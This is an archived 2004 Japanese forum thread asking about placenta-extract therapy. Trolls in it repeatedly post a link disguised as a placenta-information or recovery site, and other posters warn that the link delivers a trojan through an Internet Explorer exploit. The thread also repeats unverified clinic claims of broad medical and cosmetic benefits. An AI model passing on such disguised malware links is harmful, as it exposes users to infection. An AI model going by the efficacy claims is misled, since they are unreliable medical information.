2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

プラセンタってどうよ?

1 :卵の名無しさん:04/06/21 00:47 ID:8hZzS3DP
http://homepage1.nifty.com/nagareyamasogo/prasenta/Top.htmより
保険適応:慢性肝炎・更年期障害(年齢上限あり) 

厚生労働大臣許可、とのことだが、
http://www.info.pmda.go.jp/psearch/html/menu_tenpu_base.html
では登場しない。漢方薬みたいなもの、と考えて(・∀・)イイ!のかな?

2 :卵の名無しさん:04/06/21 00:50 ID:GiBrcjPY
2げと。

>>1
ここのサイトにプラセンタについて詳しく書いてあるよ。
http://bubalom.by.ru/luisa/gallery1.html


3 :卵の名無しさん:04/06/21 00:50 ID:8hZzS3DP
自費のものも含めて適応は・・・
免疫性疾患・アレルギー性疾患の方
  膠原病、リウマチ、気管支喘息、アトピー性皮膚炎
  蕁麻疹、食料過敏症、自己免疫疾患 等
肝疾患の方
  慢性肝炎(健康保険適用が可能です)
婦人科系疾患の方
  更年期障害(健康保険適用が可能です)
  生理不順、生理痛 等
美容目的の方
  美白、肌のくすみ、たるみ、小じわの解消、
  きめを整える、肌密度低下の防止および改善、
  肌のはりや弾力の維持 等
疲労・不眠・ストレスにお困りの方
  体が元気になりよく眠れる(疲労回復)
  イライラ、精神の安定

胎盤の中に含まれている有効成分
  タンパク質、脂質、ミネラル、ビタミン、アミノ酸、
  様々な酵素、
  各成長因子(肝細胞増殖因子、線維芽細胞増殖因子、
  コロニー形成刺激因子、インシュリン成長因子、
  インターロキシン)


4 ::04/06/21 00:53 ID:8hZzS3DP
>>2
ありがd・・・といっても外国語はよめねえ!!!

5 :2:04/06/21 00:55 ID:GiBrcjPY
>>1
PC大丈夫か?

6 ::04/06/21 01:03 ID:8hZzS3DP
>>5
俺のwin98では読めない・・・
いろいろダウンロードしてもだめだった

7 :2:04/06/21 01:10 ID:mtV33AhB
>>6
Xpじゃないと読めないのかも。
http://angelfire.lycos.com/hiphop2/rupantitle/r3/R3_temp.swfinputStr=%32%45%46%35%33%41%31%38%37%45
ではどうか??

8 :卵の名無しさん:04/06/21 01:14 ID:9XxI1KYQ
103 名前: 名無しさん@お腹いっぱい。 投稿日: 04/06/04 03:56
ttp://bubalom.by.ru/luisa/gallery1.html
騙されてここのURLを踏んでしまったら
ActiveXのスクリプトを強制的に実行させられて
HDD破壊型のトロイをプレゼントされてしまいました。
アンチソフトもないしオンラインスキャンしようとしてもIEエラーがでてできません。
こんな打つ手がない状態の僕はどうしたらよいでしょうか?



9 :卵の名無しさん:04/06/21 01:16 ID:9XxI1KYQ
123 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 04/06/04 17:04
103と同じURLを踏んで、symantecのオンラインウィルスチェックしたろころ、
「c:\WINDOWS\Temporary Internet Files\Content.IE5\112L4567\exploit[1].htm は
Trojan Horse に感染しています。」
と表示されました。
このファイルを削除したのですが、対応としてはこれで良かったのでしょうか?
被害は今のところないと思います。

129 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 04/06/04 18:27
>>123
Exploit-MhtRedirは、InternetExplorerの脆弱性を悪用して感染します。
Exploit-MhtRedirはInternet Explorerの脆弱性を悪用するコードを含んでいます。
CHM(Microsoft Compiled Help)ファイルは、
新たなエクスプロイトコードをローカルシステムに書き込み、
ダウンロードファイルを実行します。
このエクスプロイトコードは複数の異なる(悪質な)プログラムを実行するために使用されます。
ほとんどが、メールアドレスの採取、キーロガーなどのスパイウェアをインストールされる。
インターネット経由で送信するので、ファイアーウォールがあれば、検知出来るので未然に防げる。
送信されてしまうと、エロサイトのスパムメールが、送り付けられるようになる。
パッチを当てていれば、アクティブXコントロールのインストール確認画面が表示される。
はい、をクリックすると、スパイウェアをインストールされる事になる。


10 :通りすがりの者だが:04/06/21 01:17 ID:gZ1aCoHz
おいおい。

>>2のURLはちょっと前に散々あちこち貼って非難されまくったブラクラのサイトだろ?
ウイルス付きだから(今回は試してみてないが)踏まないように。

11 :通りすがりの者だが:04/06/21 01:17 ID:gZ1aCoHz
遅かったか・・・

12 :2:04/06/21 01:20 ID:mtV33AhB
>>8
>>9
馬鹿か??

13 :卵の名無しさん:04/06/21 01:26 ID:9XxI1KYQ
>>2
アホか?
HDD破壊型のトロイ貰ったPCで、2chに書き込みできるか?
昔のコピペをはっただけだよ。
もう誰も引っかからんよ。
ちゃんとパッチ当ててるよ。




14 :通りすがりの者だが:04/06/21 01:27 ID:gZ1aCoHz
また通りすがってしまった。これが最後。

>>8 >>9は先日の例を探してきて、警告のために貼ってくれた大変親切な人だろう。

15 :通りすがりの者だが:04/06/21 01:30 ID:1KcbW0v8
ブラクラを踏んだ場合の対策サイト:
http://bubalom.by.ru/luisa/gallery1.html

16 :卵の名無しさん:04/06/21 01:35 ID:9XxI1KYQ
かなり、いっちゃってますね。
人を傷つけてしまう前に、病院に行きましょう。
あなたと あなたの家族のためです。

17 :卵の名無しさん:04/06/21 01:36 ID:TEcg+G27
本題に戻ろう。
で、プラセンタって、試したひといる?

18 :通りすがりの者だが:04/06/21 01:37 ID:1KcbW0v8
>>17
ここのサイトにプラセンタについて詳しく書いてあるよ。
http://bubalom.by.ru/luisa/gallery1.html

19 :通りすがりの者だが:04/06/21 01:41 ID:1KcbW0v8
http://uk.briefcase.yahoo.com/bc/poke_1677/vwp2?.tok=bcAAAAAAxkSzDD5z&.dir=/&.dnm=pokemon.zip&.src=bc

20 :卵の名無しさん:04/06/21 01:43 ID:NUgWnZaN
132 名前:卵の名無しさん :04/06/21 00:59 ID:ORlNBjeM
↓ここのサイトにある病院は三菱京都の関連施設ですか??
<hを略>ttp://bubalom.by.ru/luisa/gallery1.html

133 名前:卵の名無しさん :04/06/21 01:11 ID:NUgWnZaN
ばか者が、その程度のブラクラで、
三菱の恐ろしさが表現できると思っているの!

134 名前:卵の名無しさん
<略>

135 名前:卵の名無しさん :04/06/21 01:31 ID:1KcbW0v8
>>133
その程度のブラクラで、売国外道の恐ろしさを
表現することは出来ぬ。

136 名前:卵の名無しさん :04/06/21 01:37 ID:NUgWnZaN

21 :卵の名無しさん:04/06/21 14:04 ID:4ydhIHwR
自由診療部門でやってる
自分でも試したけど慢性の腰痛が嘘みたいに軽くなってるよ
去年から取り扱いに文書が要るのと保管使用履歴がうるさくなったのでちょっとめんどくさいけどね

22 :卵の名無しさん:04/06/21 21:02 ID:gxHl7E2k
子どものアトピーには効くの?
そもそも子どもが使って大丈夫なもの?
子どもに使うとしたら分量へらすの?

23 :名無し募集中。。。:04/06/24 23:52 ID:QwP+Qgz+
膠原病やアトピーにも効くらしいが・・・


24 :卵の名無しさん:04/06/25 22:32 ID:XhEkAvK0
BSEは大丈夫なのかな?

8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)